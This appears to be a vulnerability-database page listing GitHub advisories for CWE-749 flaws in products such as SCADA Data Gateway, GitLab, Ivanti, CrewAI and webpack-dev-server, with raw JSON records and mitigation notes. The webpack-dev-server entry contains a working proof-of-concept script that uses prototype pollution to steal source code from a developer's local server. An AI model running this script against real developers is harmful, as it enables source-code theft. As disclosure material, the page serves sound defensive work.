Common Weakness Enumeration

CWE-749

Allowed

Exposed Dangerous Method or Function

Abstraction: Base · Status: Incomplete

The product provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted.

304 vulnerabilities reference this CWE, most recent first.

GHSA-4P7J-RQC6-FF4W

Vulnerability from github – Published: 2024-05-03 03:30 – Updated: 2024-05-03 03:30
VLAI
Details

Triangle MicroWorks SCADA Data Gateway DbasSectorFileToExecuteOnReset Exposed Dangerous Function Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Triangle MicroWorks SCADA Data Gateway. Authentication is required to exploit this vulnerability.

The specific flaw exists within the handling of DbasSectorFileToExecuteOnReset parameter. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-20799.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-39468"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-03T03:15:12Z",
    "severity": "HIGH"
  },
  "details": "Triangle MicroWorks SCADA Data Gateway DbasSectorFileToExecuteOnReset Exposed Dangerous Function Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Triangle MicroWorks SCADA Data Gateway. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of DbasSectorFileToExecuteOnReset parameter. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-20799.",
  "id": "GHSA-4p7j-rqc6-ff4w",
  "modified": "2024-05-03T03:30:56Z",
  "published": "2024-05-03T03:30:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39468"
    },
    {
      "type": "WEB",
      "url": "https://www.trianglemicroworks.com/products/scada-data-gateway/what\u0027s-new"
    },
    {
      "type": "WEB",
      "url": "https://www.zerodayinitiative.com/advisories/ZDI-23-1036"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4Q23-4XWF-899H

Vulnerability from github – Published: 2025-10-02 18:31 – Updated: 2025-10-02 21:31
VLAI
Details

The Flock Safety Android Collins application (aka com.flocksafety.android.collins) 6.35.31 for Android lacks authentication. It is responsible for the camera feed on Falcon, Sparrow, and Bravo devices, but exposes administrative API endpoints on port 8080 without authentication. Endpoints include but are not limited to: /reboot, /logs, /crashpack, and /adb/enable. This results in multiple impacts including denial of service (DoS) via /reboot, information disclosure via /logs, and remote code execution (RCE) via /adb/enable. The latter specifically results in adb being started over TCP without debugging confirmation, providing an attacker in the LAN/WLAN with shell access.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-59403"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-749"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-10-02T17:16:05Z",
    "severity": "MODERATE"
  },
  "details": "The Flock Safety Android Collins application (aka com.flocksafety.android.collins) 6.35.31 for Android lacks authentication. It is responsible for the camera feed on Falcon, Sparrow, and Bravo devices, but exposes administrative API endpoints on port 8080 without authentication. Endpoints include but are not limited to: /reboot, /logs, /crashpack, and /adb/enable. This results in multiple impacts including denial of service (DoS) via /reboot, information disclosure via /logs, and remote code execution (RCE) via /adb/enable. The latter specifically results in adb being started over TCP without debugging confirmation, providing an attacker in the LAN/WLAN with shell access.",
  "id": "GHSA-4q23-4xwf-899h",
  "modified": "2025-10-02T21:31:18Z",
  "published": "2025-10-02T18:31:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59403"
    },
    {
      "type": "WEB",
      "url": "https://gainsec.com/2025/09/27/fly-by-device-2-the-falcon-sparrow-gated-wireless-rce-camera-feed-dos-information-disclosure-and-more"
    },
    {
      "type": "WEB",
      "url": "https://gainsec.com/wp-content/uploads/2025/09/Root-from-the-Coop-Device-3_-Root-Shell-on-Flock-Safetys-Bravo-Compute-Box-GainSec.pdf"
    },
    {
      "type": "WEB",
      "url": "https://www.flocksafety.com/products"
    },
    {
      "type": "WEB",
      "url": "https://www.flocksafety.com/products/license-plate-readers"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4V9V-HFQ4-RM2V

Vulnerability from github – Published: 2025-06-04 21:09 – Updated: 2025-10-03 13:25
VLAI
Summary
webpack-dev-server users' source code may be stolen when they access a malicious web site
Details

Summary

Source code may be stolen when you access a malicious web site.

Details

Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:8080/main.js"> in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables. By using Function::toString against the values in __webpack_modules__, the attacker can get the source code.

PoC

  1. Download reproduction.zip and extract it
  2. Run npm i
  3. Run npx webpack-dev-server
  4. Open https://e29c9a88-a242-4fb4-9e64-b24c9d29b35b.pages.dev/
  5. You can see the source code output in the document and the devtools console.

image

The script in the POC site is:

let moduleList
const onHandlerSet = (handler) => {
  console.log('h', handler)
  moduleList = handler.require.m
}

const originalArrayForEach = Array.prototype.forEach
Array.prototype.forEach = function forEach(callback, thisArg) {
  callback((handler) => {
    onHandlerSet(handler)
  })
  originalArrayForEach.call(this, callback, thisArg)
  Array.prototype.forEach = originalArrayForEach
}

const script = document.createElement('script')
script.src = 'http://localhost:8080/main.js'
script.addEventListener('load', () => {
  console.log(moduleList)
  for (const key in moduleList) {
    const p = document.createElement('p')
    const title = document.createElement('strong')
    title.textContent = key
    const code = document.createElement('code')
    code.textContent = moduleList[key].toString()
    p.append(title, ':', document.createElement('br'), code)
    document.body.appendChild(p)
  }
})
document.head.appendChild(script)

This script uses the function generated by renderRequire.

    // The require function
    function __webpack_require__(moduleId) {
        // Check if module is in cache
        var cachedModule = __webpack_module_cache__[moduleId];
        if (cachedModule !== undefined) {
            return cachedModule.exports;
        }
        // Create a new module (and put it into the cache)
        var module = __webpack_module_cache__[moduleId] = {
            // no module.id needed
            // no module.loaded needed
            exports: {}
        };
        // Execute the module function
        var execOptions = {
            id: moduleId,
            module: module,
            factory: __webpack_modules__[moduleId],
            require: __webpack_require__
        };
        __webpack_require__.i.forEach(function(handler) {
            handler(execOptions);
        });
        module = execOptions.module;
        execOptions.factory.call(module.exports, module, module.exports, execOptions.require);
        // Return the exports of the module
        return module.exports;
    }

Especially, it uses the fact that Array::forEach is called for __webpack_require__.i and execOptions contains __webpack_require__. It uses prototype pollution against Array::forEach to extract __webpack_require__ reference.

Impact

This vulnerability can result in the source code to be stolen for users that uses a predictable port and output path for the entrypoint script.

Old content ### Summary Source code may be stolen when you use [`output.iife: false`](https://webpack.js.org/configuration/output/#outputiife) and access a malicious web site. ### Details When `output.iife: false` is set, some global variables for the webpack runtime are declared on the `window` object (e.g. `__webpack_modules__`). Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject `` in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. By running that, the webpack runtime variables will be declared on the `window` object. By using `Function::toString` against the values in `__webpack_modules__`, the attacker can get the source code. I pointed out `output.iife: false`, but if there are other options that makes the webpack runtime variables to be declared on the `window` object, the same will apply for those cases. ### PoC 1. Download [reproduction.zip](https://github.com/user-attachments/files/18409777/reproduction.zip) and extract it 2. Run `npm i` 3. Run `npx webpack-dev-server` 4. Open `https://852aafa3-5f83-44da-9fc6-ea116d0e3035.pages.dev/` 5. Open the devtools console. 6. You can see the content of `src/index.js` and other scripts loaded. ![image](https://github.com/user-attachments/assets/87801607-57bb-4656-bc0d-2bfbe207f436) The script in the POC site is:
const script = document.createElement('script')
script.src = 'http://localhost:8080/main.js'
script.addEventListener('load', () => {
    for (const module in window.__webpack_modules__) {
        console.log(`${module}:`, window.__webpack_modules__[module].toString())
    }
})
document.head.appendChild(script)
### Impact This vulnerability can result in the source code to be stolen for users that has `output.iife: false` option set and uses a predictable port and output path for the entrypoint script.
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.2.0"
      },
      "package": {
        "ecosystem": "npm",
        "name": "webpack-dev-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-30359"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-06-04T21:09:13Z",
    "nvd_published_at": "2025-06-03T18:15:25Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nSource code may be stolen when you access a malicious web site.\n\n### Details\nBecause the request for classic script by a script tag is not subject to same origin policy, an attacker can inject `\u003cscript src=\"http://localhost:8080/main.js\"\u003e` in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables.\nBy using `Function::toString` against the values in `__webpack_modules__`, the attacker can get the source code.\n\n### PoC\n1. Download [reproduction.zip](https://github.com/user-attachments/files/18426585/reproduction.zip) and extract it\n2. Run `npm i`\n3. Run `npx webpack-dev-server`\n4. Open `https://e29c9a88-a242-4fb4-9e64-b24c9d29b35b.pages.dev/`\n5. You can see the source code output in the document and the devtools console.\n\n![image](https://github.com/user-attachments/assets/9d4dcdca-5d24-4c84-a7b4-feb1782bca09)\n\nThe script in the POC site is:\n```js\nlet moduleList\nconst onHandlerSet = (handler) =\u003e {\n  console.log(\u0027h\u0027, handler)\n  moduleList = handler.require.m\n}\n\nconst originalArrayForEach = Array.prototype.forEach\nArray.prototype.forEach = function forEach(callback, thisArg) {\n  callback((handler) =\u003e {\n    onHandlerSet(handler)\n  })\n  originalArrayForEach.call(this, callback, thisArg)\n  Array.prototype.forEach = originalArrayForEach\n}\n\nconst script = document.createElement(\u0027script\u0027)\nscript.src = \u0027http://localhost:8080/main.js\u0027\nscript.addEventListener(\u0027load\u0027, () =\u003e {\n  console.log(moduleList)\n  for (const key in moduleList) {\n    const p = document.createElement(\u0027p\u0027)\n    const title = document.createElement(\u0027strong\u0027)\n    title.textContent = key\n    const code = document.createElement(\u0027code\u0027)\n    code.textContent = moduleList[key].toString()\n    p.append(title, \u0027:\u0027, document.createElement(\u0027br\u0027), code)\n    document.body.appendChild(p)\n  }\n})\ndocument.head.appendChild(script)\n```\n\nThis script uses the function generated by [`renderRequire`](https://github.com/webpack/webpack/blob/3919c844eca394d73ca930e4fc5506fb86e2b094/lib/javascript/JavascriptModulesPlugin.js#L1383).\n```js\n    // The require function\n    function __webpack_require__(moduleId) {\n        // Check if module is in cache\n        var cachedModule = __webpack_module_cache__[moduleId];\n        if (cachedModule !== undefined) {\n            return cachedModule.exports;\n        }\n        // Create a new module (and put it into the cache)\n        var module = __webpack_module_cache__[moduleId] = {\n            // no module.id needed\n            // no module.loaded needed\n            exports: {}\n        };\n        // Execute the module function\n        var execOptions = {\n            id: moduleId,\n            module: module,\n            factory: __webpack_modules__[moduleId],\n            require: __webpack_require__\n        };\n        __webpack_require__.i.forEach(function(handler) {\n            handler(execOptions);\n        });\n        module = execOptions.module;\n        execOptions.factory.call(module.exports, module, module.exports, execOptions.require);\n        // Return the exports of the module\n        return module.exports;\n    }\n```\nEspecially, it uses the fact that `Array::forEach` is called for `__webpack_require__.i` and `execOptions` contains `__webpack_require__`.\nIt uses prototype pollution against `Array::forEach` to extract `__webpack_require__` reference.\n\n### Impact\nThis vulnerability can result in the source code to be stolen for users that uses a predictable port and output path for the entrypoint script.\n\n\u003cdetails\u003e\n\u003csummary\u003eOld content\u003c/summary\u003e\n\n### Summary\nSource code may be stolen when you use [`output.iife: false`](https://webpack.js.org/configuration/output/#outputiife) and access a malicious web site.\n\n### Details\nWhen `output.iife: false` is set, some global variables for the webpack runtime are declared on the `window` object (e.g. `__webpack_modules__`).\nBecause the request for classic script by a script tag is not subject to same origin policy, an attacker can inject `\u003cscript src=\"http://localhost:8080/main.js\"\u003e` in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. By running that, the webpack runtime variables will be declared on the `window` object.\nBy using `Function::toString` against the values in `__webpack_modules__`, the attacker can get the source code.\n\nI pointed out `output.iife: false`, but if there are other options that makes the webpack runtime variables to be declared on the `window` object, the same will apply for those cases.\n\n### PoC\n1. Download [reproduction.zip](https://github.com/user-attachments/files/18409777/reproduction.zip) and extract it\n2. Run `npm i`\n3. Run `npx webpack-dev-server`\n4. Open `https://852aafa3-5f83-44da-9fc6-ea116d0e3035.pages.dev/`\n5. Open the devtools console.\n6. You can see the content of `src/index.js` and other scripts loaded.\n\n![image](https://github.com/user-attachments/assets/87801607-57bb-4656-bc0d-2bfbe207f436)\n\nThe script in the POC site is:\n```js\nconst script = document.createElement(\u0027script\u0027)\nscript.src = \u0027http://localhost:8080/main.js\u0027\nscript.addEventListener(\u0027load\u0027, () =\u003e {\n    for (const module in window.__webpack_modules__) {\n        console.log(`${module}:`, window.__webpack_modules__[module].toString())\n    }\n})\ndocument.head.appendChild(script)\n```\n\n### Impact\nThis vulnerability can result in the source code to be stolen for users that has `output.iife: false` option set and uses a predictable port and output path for the entrypoint script.\n\n\u003c/details\u003e",
  "id": "GHSA-4v9v-hfq4-rm2v",
  "modified": "2025-10-03T13:25:38Z",
  "published": "2025-06-04T21:09:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/webpack/webpack-dev-server/security/advisories/GHSA-4v9v-hfq4-rm2v"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30359"
    },
    {
      "type": "WEB",
      "url": "https://github.com/webpack/webpack-dev-server/commit/5c9378bb01276357d7af208a0856ca2163db188e"
    },
    {
      "type": "WEB",
      "url": "https://github.com/webpack/webpack-dev-server/commit/d2575ad8dfed9207ed810b5ea0ccf465115a2239"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/webpack/webpack-dev-server"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "webpack-dev-server users\u0027 source code may be stolen when they access a malicious web site"
}

GHSA-4VHG-QVJQ-W8M6

Vulnerability from github – Published: 2023-09-14 00:30 – Updated: 2023-12-28 18:30
VLAI
Details

The SolarWinds Platform was susceptible to the Incorrect Comparison Vulnerability. This vulnerability allows users with administrative access to SolarWinds Web Console to execute arbitrary commands with NETWORK SERVICE privileges.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-23845"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-697",
      "CWE-749"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-09-13T23:15:08Z",
    "severity": "HIGH"
  },
  "details": "The SolarWinds Platform was susceptible to the Incorrect Comparison Vulnerability. This vulnerability allows users with administrative access to SolarWinds Web Console to execute arbitrary commands with NETWORK SERVICE privileges.",
  "id": "GHSA-4vhg-qvjq-w8m6",
  "modified": "2023-12-28T18:30:32Z",
  "published": "2023-09-14T00:30:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23845"
    },
    {
      "type": "WEB",
      "url": "https://documentation.solarwinds.com/en/success_center/orionplatform/content/release_notes/solarwinds_platform_2023-3-1_release_notes.htm"
    },
    {
      "type": "WEB",
      "url": "https://www.solarwinds.com/trust-center/security-advisories/CVE-2023-23845"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-5FG5-92P6-87XV

Vulnerability from github – Published: 2026-05-12 15:31 – Updated: 2026-05-12 15:31
VLAI
Details

An exposed dangerous method on the Core Server of Ivanti Endpoint Manager before version 2024 SU6 allows a remote authenticated attacker to leak access credentials.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-8109"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-12T15:16:17Z",
    "severity": "MODERATE"
  },
  "details": "An exposed dangerous method\u00a0on\u00a0the Core Server of\u00a0Ivanti Endpoint Manager\u00a0before\u00a0version\u00a02024 SU6\u00a0allows a\u00a0remote authenticated\u00a0attacker to\u00a0leak access credentials.",
  "id": "GHSA-5fg5-92p6-87xv",
  "modified": "2026-05-12T15:31:41Z",
  "published": "2026-05-12T15:31:41Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8109"
    },
    {
      "type": "WEB",
      "url": "https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-EPM-May-2026?language=en_US"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-5GGG-P758-CX97

Vulnerability from github – Published: 2022-05-13 01:38 – Updated: 2025-04-20 03:34
VLAI
Details

Multiple versions of GitLab expose a dangerous method to any authenticated user that could lead to the deletion of all Issue and MergeRequest objects on a GitLab instance. For GitLab instances with publicly available projects this vulnerability could be exploited by an unauthenticated user. A fix was included in versions 8.14.3, 8.13.8, and 8.12.11, which were released on December 5th 2016 at 3:59 PST. The GitLab versions vulnerable to this are 8.13.0, 8.13.0-ee, 8.13.1, 8.13.1-ee, 8.13.2, 8.13.2-ee, 8.13.3, 8.13.3-ee, 8.13.4, 8.13.4-ee, 8.13.5, 8.13.5-ee, 8.13.6, 8.13.6-ee, 8.13.7, 8.14.0, 8.14.0-ee, 8.14.1, 8.14.2, and 8.14.2-ee.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2016-9469"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-03-28T02:59:00Z",
    "severity": "HIGH"
  },
  "details": "Multiple versions of GitLab expose a dangerous method to any authenticated user that could lead to the deletion of all Issue and MergeRequest objects on a GitLab instance. For GitLab instances with publicly available projects this vulnerability could be exploited by an unauthenticated user. A fix was included in versions 8.14.3, 8.13.8, and 8.12.11, which were released on December 5th 2016 at 3:59 PST. The GitLab versions vulnerable to this are 8.13.0, 8.13.0-ee, 8.13.1, 8.13.1-ee, 8.13.2, 8.13.2-ee, 8.13.3, 8.13.3-ee, 8.13.4, 8.13.4-ee, 8.13.5, 8.13.5-ee, 8.13.6, 8.13.6-ee, 8.13.7, 8.14.0, 8.14.0-ee, 8.14.1, 8.14.2, and 8.14.2-ee.",
  "id": "GHSA-5ggg-p758-cx97",
  "modified": "2025-04-20T03:34:57Z",
  "published": "2022-05-13T01:38:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-9469"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/186194"
    },
    {
      "type": "WEB",
      "url": "https://about.gitlab.com/2016/12/05/cve-2016-9469"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/gitlab-ce/commit/29ceb98b5162677601702704e89d845580372078"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/gitlab-ce/commit/55196497301eea429913f9c4b1b37c42c2e358ce"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/gitlab-ce/commit/f325e4e734e5e486f3b02db176eb629124052b43"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/gitlab-ce/issues/25064"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-5GJ7-3J23-W2H2

Vulnerability from github – Published: 2026-04-09 00:32 – Updated: 2026-04-09 00:32
VLAI
Details

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 16.9.6 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user to invoke unintended server-side methods through websocket connections due to improper access control.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-5173"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-08T23:17:00Z",
    "severity": "HIGH"
  },
  "details": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 16.9.6 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user to invoke unintended server-side methods through websocket connections due to improper access control.",
  "id": "GHSA-5gj7-3j23-w2h2",
  "modified": "2026-04-09T00:32:01Z",
  "published": "2026-04-09T00:32:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5173"
    },
    {
      "type": "WEB",
      "url": "https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/588959"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-5PR4-QMC6-FVXJ

Vulnerability from github – Published: 2026-03-02 09:30 – Updated: 2026-03-02 21:31
VLAI
Details

In wlan STA driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00465314; Issue ID: MSV-4956.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-20423"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749",
      "CWE-787"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-02T09:16:15Z",
    "severity": "HIGH"
  },
  "details": "In wlan STA driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00465314; Issue ID: MSV-4956.",
  "id": "GHSA-5pr4-qmc6-fvxj",
  "modified": "2026-03-02T21:31:26Z",
  "published": "2026-03-02T09:30:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20423"
    },
    {
      "type": "WEB",
      "url": "https://corp.mediatek.com/product-security-bulletin/March-2026"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-5W94-5WXP-RC42

Vulnerability from github – Published: 2026-03-30 18:31 – Updated: 2026-03-31 18:31
VLAI
Details

The CrewAI CodeInterpreter tool falls back to SandboxPython when it cannot reach Docker, which can enable RCE through arbitrary C function calling.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-2275"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-30T16:16:04Z",
    "severity": "CRITICAL"
  },
  "details": "The CrewAI CodeInterpreter tool falls back to SandboxPython when it cannot reach Docker, which can enable RCE through arbitrary C function calling.",
  "id": "GHSA-5w94-5wxp-rc42",
  "modified": "2026-03-31T18:31:29Z",
  "published": "2026-03-30T18:31:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2275"
    },
    {
      "type": "WEB",
      "url": "https://docs.crewai.com/en/tools/ai-ml/codeinterpretertool"
    },
    {
      "type": "WEB",
      "url": "https://www.kb.cert.org/vuls/id/221883"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-5WPV-2G59-V5GG

Vulnerability from github – Published: 2022-05-24 16:51 – Updated: 2024-04-04 01:24
VLAI
Details

An RCE (Remote Code Execution) vulnerability exists in the UCS software through 6.0.0 used by Polycom Products. The vulnerability could allow an authenticated, remote attacker to execute arbitrary code. The vulnerability is due to improper validation of files uploaded to the affected application. An attacker could exploit this vulnerability by authenticating to the affected system and uploading an arbitrary file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-12948"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-07-29T16:15:00Z",
    "severity": "HIGH"
  },
  "details": "An RCE (Remote Code Execution) vulnerability exists in the UCS software through 6.0.0 used by Polycom Products. The vulnerability could allow an authenticated, remote attacker to execute arbitrary code. The vulnerability is due to improper validation of files uploaded to the affected application. An attacker could exploit this vulnerability by authenticating to the affected system and uploading an arbitrary file.",
  "id": "GHSA-5wpv-2g59-v5gg",
  "modified": "2024-04-04T01:24:25Z",
  "published": "2022-05-24T16:51:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12948"
    },
    {
      "type": "WEB",
      "url": "https://support.polycom.com/content/dam/polycom-support/global/documentation/remote-code-execution-vulnerability-in-ucs-software-v1-0.pdf"
    },
    {
      "type": "WEB",
      "url": "https://support.polycom.com/content/dam/polycom-support/global/documentation/remote-code-execution-vulnerability-in-ucs-software-v1-1.pdf"
    },
    {
      "type": "WEB",
      "url": "https://support.polycom.com/content/support/security-center.html"
    },
    {
      "type": "WEB",
      "url": "https://www.poly.com/us/en"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

If you must expose a method, make sure to perform input validation on all arguments, limit access to authorized parties, and protect against all possible vulnerabilities.

Mitigation
Architecture and Design Implementation

Strategy: Attack Surface Reduction

  • Identify all exposed functionality. Explicitly list all functionality that must be exposed to some user or set of users. Identify which functionality may be:
  • Ensure that the implemented code follows these expectations. This includes setting the appropriate access modifiers where applicable (public, private, protected, etc.) or not marking ActiveX controls safe-for-scripting.
  • accessible to all users
  • restricted to a small set of privileged users
  • prevented from being directly accessible at all
CAPEC-500: WebView Injection

An adversary, through a previously installed malicious application, injects code into the context of a web page displayed by a WebView component. Through the injected code, an adversary is able to manipulate the DOM tree and cookies of the page, expose sensitive information, and can launch attacks against the web application from within the web page.